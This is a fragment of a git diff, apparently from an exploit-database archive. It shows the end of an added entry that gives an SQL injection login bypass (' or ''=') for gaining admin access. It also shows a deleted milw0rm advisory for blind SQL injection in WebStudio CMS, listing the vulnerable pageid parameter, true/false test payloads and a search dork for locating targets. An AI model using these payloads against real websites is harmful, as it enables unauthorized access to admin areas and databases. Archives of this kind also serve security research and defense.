+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Navigate to scripts admin login page and submit ' or ''=' for username and password
+it should give you access to the admin area. Enjoy >:)
diff --git a/platforms/php/webapps/7236.txt b/platforms/php/webapps/7236.txt
deleted file mode 100755
index d609dfd0c..000000000
--- a/platforms/php/webapps/7236.txt
+++ /dev/null
@@ -1,32 +0,0 @@
-submitted: 09/01/2008 10:01 AM
------------------------------------------------------------------------------------
-Scr!pt : WebStudio CMS
-
-V3rs!0n : >!<
-
-S!t3 : http://www.bdigital.biz/?pageid=214
-
-Dork : Powered by WebStudio
-
-Auth0r : BorN To K!LL
------------------------------------------------------------------------------------
-
-Exploit :
-
-/index.php?pageid=[Blind SQL]
-
-Compression :
-
-index.php?pageid=1 and 1=1 <<<<< True
-
-index.php?pageid=1 and 1=2 <<<<< False
-
------------------------------------------------------------------------------------
-
-Greets :
-
-str0ke , Dr.2 , General C , CcTero0liTi , GolD_M , n all my friends ..
-
------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-26]